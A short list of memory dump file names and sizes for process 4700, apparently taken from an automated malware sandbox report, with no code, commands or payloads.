memory/4700-116-0x0000000006920000-0x0000000006930000-memory.dmpFilesize
64KB
-
memory/4700-240-0x0000000009CF0000-0x0000000009D23000-memory.dmpFilesize
204KB
-
memory/4700-118-0x00000000075E0000-0x0000000007602000-memory.dmpFilesize
136KB
-
memory/4700-244-0x000000006EB90000-0x000000006EBDB000-memory.dmpFilesize
300KB
-
memory/4700-125-0x00000000079D0000-0x0000000007D20000-memory.dmpFilesize
3.3MB
-
memory/4700-242-0x000000007E3F0000-0x000000007E400000-memory.dmpFilesize
64KB
-
memory/4700-128-0x0000000007D80000-0x0000000007DCB000-memory.dmpFilesize
300KB
-
memory/4700-227-0x0000000008E80000-0x0000000008EF6000-memory.dmpFilesize
472KB